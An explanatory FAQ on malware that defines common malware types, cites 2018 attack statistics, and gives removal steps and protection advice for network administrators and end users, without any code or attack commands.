What is malware?
Malware (malicious software) is any type of programming intended to cause harm. Among other things, a malware infection can corrupt files, alter or delete data, distribute confidential data, disable hardware, deny legitimate user access, and cause a hard drive to crash. Frequently, the origin of malware is designed to be spoofed. This can be confusing, especially if malicious code seems to send itself from your e-mail account to all the friends and colleagues in your address book. The results of malware infection include compromised systems, lack of regulatory compliance, lost or stolen data, and the loss of user and client confidence.
Global malware attacks rose in 2018 for the third consecutive year, with a record number of 10.52 billion attacks recorded, according to the latest Cyber threat report by security firm SonicWall. The number of malware attacks was up 22% compared with 2017, and up 29% compared with 2016, with more than 391,600 new attack variants identified in the past year, including 74,290 never-seen-before attacks.
Brazil saw the biggest increase in malware volume of 119%, followed by Canada (103%), Germany (99%), and the UK (57%) – although the UK volume of nearly 584 million was second only to the US, which recorded the highest malware volume of just more than five billion instances.
Common types of malware
Although each type of malware has defining characteristics, the distinctions between them are becoming blurred because blended threats are becoming increasingly common. Blended threats combine characteristics of more than one type of malware to maximize the damage they cause and the speed of contagion.
Viruses self-replicate within computers and across networks and alter files or data. They usually require some action on the user's part to start, most often just clicking an executable file attachment on an e-mail (although embedded programming in an e-mail message can execute a virus program). Typically, people think that the file came to them from a trusted source or is something they want to see.
Worms are a virus variant that can infect a computer without any user interaction. A worm doesn't alter files, but resides in active memory and duplicates itself. Worms use parts of an operating system that are automatic and usually invisible to the user. It is common for worms to be noticed only when their uncontrolled replication consumes system resources, slowing or halting other tasks.
Trojans are malicious coding hidden in within innocuous programming or data in such a way that it can get control and do its chosen form of damage, such as ruining the file allocation table on your hard disk. A Trojan horse may be widely redistributed along with a virus.
Spyware is programming that is put into your computer to secretly gather information and relay it to advertisers or other interested parties. Spyware can get in a computer as a software virus or as the result of installing a new program. Although not malicious in intent, spyware is often installed without your consent and even without your knowledge, as a drive-by download or as the result of clicking a compromised URL. By the same token, adware, which usually includes spyware components, can also be considered malware.
Browser hijackers are programs that alter your computer's browser settings so that you are redirected to Web sites you had no intention of visiting. Most browser hijackers alter default home pages and search pages to those of their customers, who pay for that service because of the traffic it generates. More virulent versions often: add bookmarks for pornographic Web sites to the users' own bookmark collection; generate pornographic pop-up windows faster than the user can click them shut; and redirect users to pornographic sites when they inadvertently mistype a URL or enter a URL without the www. preface. Poorly coded browser hijackers -- which, unsurprisingly, are common -- may also slow your computer down and cause browser crashes.
Point-of-sale malware (POS malware) is malicious software expressly written to steal customer payment data -- especially credit card data -- from retail checkout systems. There two ways to target a store's customer credit card data: The attacker can infiltrate databases where the data is stored or intercept the data at the point of sale (POS).
Cryptomining malware is malicious code that takes over a computing device's resources so an attacker can use the device's processing power to track and verify cryptocurrency transactions in a distributed ledger. Because cryptomining software runs in the background, a user might not realize they have been the victim of an attack until they experience a graceful degradation of service.
Mobile malware is malicious software specifically written to attack mobile devices such as smartphones, tablets, and smartwatches. These types of malware rely on exploits of particular mobile operating systems and mobile phone technology.
Memory-scraping malware is a type of malware that helps hackers to find personal data. It examines memory to search for sensitive data that is not available through other processes.
Fileless malware attacks are a type of malicious attack a hacker can use to leverage applications already installed in a computer. Unlike other malware attacks where software is unknowingly installed onto the user’s device, fileless malware attacks use applications that are already installed which are thought to be safe.
Metamorphic and polymorphic malware are two categories of malicious software programs (malware) that have the ability to change their code as they propagate. Metamorphic malware is rewritten with each iteration so that each succeeding version of the code is different from the preceding one. The code changes makes it difficult for signature-based antivirus software programs to recognize that different iterations are the same malicious program.
Extension malware is any browser extension that was developed intentionally to cause undesirable behaviors. Security experts recommend that users be judicious when installing browser extensions. Whenever possible, you should check what permissions an extension requires. It’s wise, as well, to refrain from installing extensions from unknown companies and developers.
TDL-4 is sophisticated malware that facilitates the creation and maintenance of a botnet. The program is the fourth generation of the TDL malware, which was itself based on an earlier malicious program known as TDSS or Alureon. Like other botnets, the TDL network is used for spam and malware dissemination, denial of service (DOS) attacks, password theft and other types of online fraud.
Malvertisements (malicious advertisements) are advertisement son the Internet that are capable of infecting the viewer's computer with malware. Malvertising is the current computer hijacking technique of choice for organized crime. Compromised computers can be used to create powerful botnets that can be used to carry out identity theft, corporate espionage or other illegal activity.
Scareware is a type of malware designed to trick victims into purchasing and downloading useless and potentially dangerous software that pretends to be antivirus or antispyware software, a firewall application or a registry cleaner. End users may get a message that says a large number of problems -- such as infected files -- have been found on the computer and the user is prompted to purchase software to fix the problems. In reality, no problems were detected and the suggested software purchase may actually contain real malware.
How is most malware distributed?
Typically, malware is distributed in one of three methods: by e-mail, either through a virus-laden attachment or code embedded in the message body; in an infected application; or through infected code on a Web site. Originally, removable media -- typically a USB drive -- was the vehicle most malware took to get to your computer, but now the vast majority of malware is distributed electronically.
A dropper is a malware installer that surreptitiously carries viruses, back doors and other malicious software so they can be executed on the compromised machine. Droppers don’t cause harm directly but can deliver a malware payload onto a target machine without detection.
Domain rotation is a technique use by malware distributors to drive traffic from multiple domains to a single IP address that is controlled by the distributor. The goal of domain rotation is to make it harder for a network administrator to blacklist the malware distributor.
Mimikatz is an open source malware program used by hackers and penetration testers to gather credentials on Windows computers. Hackers use Mimikatz to extend their presence on victim networks by extracting and using keys that may have been reused on other systems or by extracting keys from accounts with elevated privileges, such as those used by administrators.
How can I tell if my network has been compromised by malware?
An intrusion detection system (IDS) will likely spot any known malware attack. However, a new exploit could escape detection. Signs that your network has been compromised include a sudden, unexplained spike in traffic; unscheduled server reboots; signatures of known exploits in log files; unexplained failed logons; evidence of a packet sniffer; and a large number of spoofed packets detected leaving your network.
Are the number of malware attacks increasing?
Yes. As network defenses increase in sophistication, so do the anonymity of attacks and the targeting of non-standard ports to ensure malicious payloads are concealed upon delivery. For example, SonicWall threat researchers identified processor vulnerabilities as a growing security concern for software and hardware technologies, with multiple side-channel attacks among the new attack vectors detected in the past year. Based on a sampling of more than 700 million malware attacks, SonicWall found that 19.2% of malware attacks used non-standard ports, which was up 8.7% when compared to 2017.
What's the spam-malware connection?
Although malware-laden messages are often thought to be a different category of unwanted e-mail, they generally fit the criteria for spam:
A. They're unsolicited; and
B. They're sent in bulk.
Ed Skoudis, author of Malware: Fighting Malicious Code explains how it works: "Malware and spam are working together in a vicious cycle. Attackers use spam to spread backdoors to machines via mass e-mailings. Unwitting users execute these e-mail attachments, thereby installing the backdoor onto their systems. Attackers then use the newly infected system as a bounce-off point to send even more spam while laundering their source address and evading e-mail server antirelay and filter settings."
MessageLabs, a New York-based company, analyzed server data and found that many spam messages were originating from known sources of viruses. According to their analysis, MessageLabs reported that the Sobig virus and its earlier variants were probably created by spammers.
The point: Spam isn't just a nuisance; it's a serious threat to network security. Deleting junk e-mails at the desktop isn't good enough. Use the best spam filters available, and push for global solutions to the spam problem.
How do I get rid of malware?
If both anti-spyware product and anti-virus fail you, you will probably have to try a more hands-on approach. The first thing to do is to find and disable suspicious processes. For recent Windows operating systems, bring up the Task Manager window (hit control-alt-delete or right-click the task bar to do this) and look under the processes tab. A number of Web sites, such as Sysinfo.org and reger24.de, have lists and/or searchable databases of start-up processes. If you can't find any information there about what a currently running process is, plug its name into a search engine. When you identify a process as being part of the malware problem, select it in Task Manager and click the end process button.
Sometimes when you do so, you'll get a message such as "access denied", in which case you'll have to use stronger medicine. A program such as Pskill, from SysInternals, will do the trick. Pskill is available from the company's Web site. Follow the straight-forward instructions there to remove any stubborn processes. Another program, such as autoruns.exe (also available from SysInternals) can be used to help you find the settings causing these programs to run again when Windows is restarted. Delete these when you find them. Once you've completed these processes, the malware will be disabled. One final word of caution: be very sure that a program is malware before you delete it, or you could cause yourself more problems than you solve.
What should I be doing to protect my system /network from malware?
There's a reason you were vulnerable to an attack, so you will need to work backward to find the gaps in your security strategy. If it's your users, look at security awareness training. If the problem is too many phishing emails coming through, look at an email scanning product. The best position to protect your organization from malware is to have a layered approach, with each step addressing the problem of attacks from a different angle.
There are a lot of unknowns when it comes to malware attacks. It's one of the reasons this six-step malware response plan is so high-level. The key is to have a plan in place and proactively work backward to be ready. Determine what backups you require in the event of a successful attack and have a means by which users can inform IT of a possible infection. By following these steps, you have the foundation for a response plan that can address just about any malware attack.
For network administrators:
- Keep up with new threats -- it's not just your virus definitions that need to be kept up to date. Subscribe to an e-mail service, such as the one from Sophos, that sends out alerts about new malware as soon as it surfaces
- Ensure that appropriate security patches are installed promptly as soon as they become available. Although Microsoft released a patch for a security vulnerability in IIS server, both Nimda and Code Red were able to exploit the weakness, because so many systems remained unpatched
- Block file types commonly used to distribute viruses, such as exe, .pif, .scr, and .vbs. Although virus-laden attachments can appear to be of any file type, you'll be ahead if you keep out the usual suspects.
- Educate end users in safe messaging and browsing behavior
- Minimize user access to sensitive data
- Establish security policies for employees, with consequences for breaking the rules.
- Push security patches to end users
- Install a secure enterprise instant messaging (EIM) product or add security components to other products
- Schedule frequent security audits, preferably conducted by external auditors
- Ensure that remote users -- and their equipment -- are not security risks
- Have a disaster recovery plan in place, to protect your network and data from unforeseeable catastrophes
For end users:
- Keep virus definitions up to date and run antivirus software on a regular basis, at home as well as at work. If your home computer, laptop, or handheld device is in contact with computers at work, poor security practices could put the whole network at risk.
- Visit the Windows Update page frequently and download any advised security patches.
- Check the security information and options in your Web browser and set the latter appropriately.
- Never open questionable attachments. It pays to be suspicious, even if the message purports to be from someone you know. If an attachment is unexpected, verify with the sender before you open it. Because file extensions can be spoofed, don't assume that a file is safe to open, even if it appears to be a text file.
- Don't even open messages that seem suspicious. Malware can be embedded in the content of the message itself. Some viruses, such as BubbleBoy, Kak, and Nimda can infect your computer as soon as you open a message.
- Don't preview messages. If you browse through your messages with the preview window open, in effect you're opening each message that appears there.Viewing or previewing messages also encourages more spam. Many spam messages include a mechanism that informs the sender when a message is viewed. This confirms a live address, to which greater volumes of spam -- some of it virus-laden -- will be sent.
- Use appropriately stringent security settings in your e-mail program. In Outlook, for example, under Tools > Options > Security > Secure content > Attachment security, set attachment security to High so that you'll be prompted before opening attachments.
- Watch out for social engineering attempts. Never give out passwords or other protected information; don't leave them lying around (or on a sticky note affixed to your computer, for that matter -- a surprisingly common practice).
- If possible, opt to view messages in text only